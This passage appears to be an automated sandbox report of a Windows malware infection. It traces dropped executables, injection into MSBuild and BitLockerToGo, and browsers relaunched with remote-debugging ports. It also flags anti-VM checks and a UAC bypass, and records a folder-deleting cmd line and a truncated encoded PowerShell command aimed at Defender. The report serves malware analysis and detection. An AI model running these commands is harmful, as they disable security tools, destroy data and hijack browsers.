                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x21c,0x2f4,0x7fff31f7f208,0x7fff31f7f214,0x7fff31f7f220
                                                8⤵
                                                  PID:4296
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1688,i,11908565502347282511,9788480012604774205,262144 --variations-seed-version --mojo-platform-channel-handle=2408 /prefetch:3
                                                  8⤵
                                                    PID:5796
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2368,i,11908565502347282511,9788480012604774205,262144 --variations-seed-version --mojo-platform-channel-handle=2332 /prefetch:2
                                                    8⤵
                                                      PID:6552
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1948,i,11908565502347282511,9788480012604774205,262144 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:8
                                                      8⤵
                                                        PID:6464
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3544,i,11908565502347282511,9788480012604774205,262144 --variations-seed-version --mojo-platform-channel-handle=3648 /prefetch:1
                                                        8⤵
                                                        • Uses browser remote debugging
                                                        PID:7544
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3536,i,11908565502347282511,9788480012604774205,262144 --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:1
                                                        8⤵
                                                        • Uses browser remote debugging
                                                        PID:7552
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4728,i,11908565502347282511,9788480012604774205,262144 --variations-seed-version --mojo-platform-channel-handle=4704 /prefetch:8
                                                        8⤵
                                                          PID:2012
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4732,i,11908565502347282511,9788480012604774205,262144 --variations-seed-version --mojo-platform-channel-handle=4716 /prefetch:8
                                                          8⤵
                                                            PID:4888
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5396,i,11908565502347282511,9788480012604774205,262144 --variations-seed-version --mojo-platform-channel-handle=5416 /prefetch:8
                                                            8⤵
                                                              PID:2016
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                            7⤵
                                                            • Uses browser remote debugging
                                                            PID:8164
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                            7⤵
                                                            • Uses browser remote debugging
                                                            PID:2120
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x25c,0x260,0x264,0x258,0x2d8,0x7fff31f7f208,0x7fff31f7f214,0x7fff31f7f220
                                                              8⤵
                                                                PID:4048
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1700,i,13555803781915859008,16687451165491019260,262144 --variations-seed-version --mojo-platform-channel-handle=2496 /prefetch:3
                                                                8⤵
                                                                  PID:5568
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2468,i,13555803781915859008,16687451165491019260,262144 --variations-seed-version --mojo-platform-channel-handle=2464 /prefetch:2
                                                                  8⤵
                                                                    PID:7804
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2164,i,13555803781915859008,16687451165491019260,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:8
                                                                    8⤵
                                                                      PID:5448
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3516,i,13555803781915859008,16687451165491019260,262144 --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:1
                                                                      8⤵
                                                                      • Uses browser remote debugging
                                                                      PID:7240
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3524,i,13555803781915859008,16687451165491019260,262144 --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:1
                                                                      8⤵
                                                                      • Uses browser remote debugging
                                                                      PID:4452
                                                                  • C:\ProgramData\riwtjmycjw.exe
                                                                    "C:\ProgramData\riwtjmycjw.exe"
                                                                    7⤵
                                                                      PID:7708
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                        8⤵
                                                                          PID:7784
                                                                      • C:\ProgramData\djmo8g4ect.exe
                                                                        "C:\ProgramData\djmo8g4ect.exe"
                                                                        7⤵
                                                                          PID:4452
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                            8⤵
                                                                              PID:5348
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                9⤵
                                                                                • Uses browser remote debugging
                                                                                PID:12364
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fff3572dcf8,0x7fff3572dd04,0x7fff3572dd10
                                                                                  10⤵
                                                                                    PID:12396
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2524,i,2526054269278738371,6449145487142570570,262144 --variations-seed-version --mojo-platform-channel-handle=2516 /prefetch:2
                                                                                    10⤵
                                                                                      PID:13208
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1576,i,2526054269278738371,6449145487142570570,262144 --variations-seed-version --mojo-platform-channel-handle=2504 /prefetch:3
                                                                                      10⤵
                                                                                        PID:13204
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2092,i,2526054269278738371,6449145487142570570,262144 --variations-seed-version --mojo-platform-channel-handle=2640 /prefetch:8
                                                                                        10⤵
                                                                                          PID:13268
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,2526054269278738371,6449145487142570570,262144 --variations-seed-version --mojo-platform-channel-handle=3336 /prefetch:1
                                                                                          10⤵
                                                                                          • Uses browser remote debugging
                                                                                          PID:12240
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,2526054269278738371,6449145487142570570,262144 --variations-seed-version --mojo-platform-channel-handle=3352 /prefetch:1
                                                                                          10⤵
                                                                                          • Uses browser remote debugging
                                                                                          PID:12344
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3984,i,2526054269278738371,6449145487142570570,262144 --variations-seed-version --mojo-platform-channel-handle=4000 /prefetch:2
                                                                                          10⤵
                                                                                          • Uses browser remote debugging
                                                                                          PID:12328
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4584,i,2526054269278738371,6449145487142570570,262144 --variations-seed-version --mojo-platform-channel-handle=4664 /prefetch:1
                                                                                          10⤵
                                                                                          • Uses browser remote debugging
                                                                                          PID:12500
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4928,i,2526054269278738371,6449145487142570570,262144 --variations-seed-version --mojo-platform-channel-handle=4944 /prefetch:8
                                                                                          10⤵
                                                                                            PID:13012
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                          9⤵
                                                                                          • Uses browser remote debugging
                                                                                          PID:13284
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch
                                                                                            10⤵
                                                                                            • Uses browser remote debugging
                                                                                            PID:6352
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x258,0x25c,0x260,0x254,0x2f4,0x7fff3019f208,0x7fff3019f214,0x7fff3019f220
                                                                                              11⤵
                                                                                                PID:12324
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1928,i,8296292052606937472,15285475879947839094,262144 --variations-seed-version --mojo-platform-channel-handle=2644 /prefetch:3
                                                                                                11⤵
                                                                                                  PID:4896
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2576,i,8296292052606937472,15285475879947839094,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:2
                                                                                                  11⤵
                                                                                                    PID:13232
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1256,i,8296292052606937472,15285475879947839094,262144 --variations-seed-version --mojo-platform-channel-handle=2844 /prefetch:8
                                                                                                    11⤵
                                                                                                      PID:13236
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3456,i,8296292052606937472,15285475879947839094,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:1
                                                                                                      11⤵
                                                                                                      • Uses browser remote debugging
                                                                                                      PID:6864
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3464,i,8296292052606937472,15285475879947839094,262144 --variations-seed-version --mojo-platform-channel-handle=3524 /prefetch:1
                                                                                                      11⤵
                                                                                                      • Uses browser remote debugging
                                                                                                      PID:5500
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5048,i,8296292052606937472,15285475879947839094,262144 --variations-seed-version --mojo-platform-channel-handle=4900 /prefetch:8
                                                                                                      11⤵
                                                                                                        PID:14156
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4944,i,8296292052606937472,15285475879947839094,262144 --variations-seed-version --mojo-platform-channel-handle=5032 /prefetch:8
                                                                                                        11⤵
                                                                                                          PID:14164
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5192,i,8296292052606937472,15285475879947839094,262144 --variations-seed-version --mojo-platform-channel-handle=5400 /prefetch:8
                                                                                                          11⤵
                                                                                                            PID:14252
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AAKKECFBGI.exe"
                                                                                                        9⤵
                                                                                                          PID:6840
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\KJEHDHIEGI.exe"
                                                                                                          9⤵
                                                                                                            PID:7476
                                                                                                      • C:\ProgramData\a1vsjeknyu.exe
                                                                                                        "C:\ProgramData\a1vsjeknyu.exe"
                                                                                                        7⤵
                                                                                                          PID:6856
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jaztTplZ\CW9xuIpEaGz8ha0d.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jaztTplZ\CW9xuIpEaGz8ha0d.exe 0
                                                                                                            8⤵
                                                                                                              PID:8124
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jaztTplZ\Vi4OwwXoN4xGqs3j.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jaztTplZ\Vi4OwwXoN4xGqs3j.exe 8124
                                                                                                                9⤵
                                                                                                                  PID:1612
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 660
                                                                                                                    10⤵
                                                                                                                    • Program crash
                                                                                                                    PID:12232
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\TcYKBoAA\NE4LPJvnGhyBUaCd.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\TcYKBoAA\NE4LPJvnGhyBUaCd.exe 0
                                                                                                                  9⤵
                                                                                                                    PID:12480
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                      10⤵
                                                                                                                        PID:12884
                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                        10⤵
                                                                                                                          PID:12904
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jaztTplZ\jGUfoiAx4BIAZW8D.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jaztTplZ\jGUfoiAx4BIAZW8D.exe 8124
                                                                                                                        9⤵
                                                                                                                          PID:12552
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 12552 -s 656
                                                                                                                            10⤵
                                                                                                                            • Program crash
                                                                                                                            PID:11716
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jaztTplZ\Dxb7JwDykvwY2zBq.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jaztTplZ\Dxb7JwDykvwY2zBq.exe 8124
                                                                                                                          9⤵
                                                                                                                            PID:14076
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jaztTplZ\M9mhvXxbPjgAa4Rd.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jaztTplZ\M9mhvXxbPjgAa4Rd.exe 8124
                                                                                                                            9⤵
                                                                                                                              PID:4332
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 620
                                                                                                                                10⤵
                                                                                                                                • Program crash
                                                                                                                                PID:9524
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\58q9r" & exit
                                                                                                                          7⤵
                                                                                                                            PID:12384
                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                              timeout /t 11
                                                                                                                              8⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:12680
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:4932
                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                          6⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:1644
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10028170101\ef3f62af7e.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10028170101\ef3f62af7e.exe"
                                                                                                                        5⤵
                                                                                                                          PID:5352
                                                                                                                          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                            6⤵
                                                                                                                              PID:1640
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10028180101\1e359880c5.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10028180101\1e359880c5.exe"
                                                                                                                            5⤵
                                                                                                                              PID:6180
                                                                                                                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:4932
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10168510101\7T7bCyA.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10168510101\7T7bCyA.exe"
                                                                                                                            3⤵
                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Identifies Wine through registry keys
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:452
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10171300101\s7MG2VL.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10171300101\s7MG2VL.exe"
                                                                                                                            3⤵
                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Identifies Wine through registry keys
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:6104
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:5796
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5572
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:3960
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10204230101\9JFiKVm.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10204230101\9JFiKVm.exe"
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:364
                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                              4⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:624
                                                                                                                              • C:\Users\Admin\AppData\Roaming\r18ul32LfO.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\r18ul32LfO.exe"
                                                                                                                                5⤵
                                                                                                                                • UAC bypass
                                                                                                                                • Checks computer location settings
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                • System policy modification
                                                                                                                                PID:1588
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
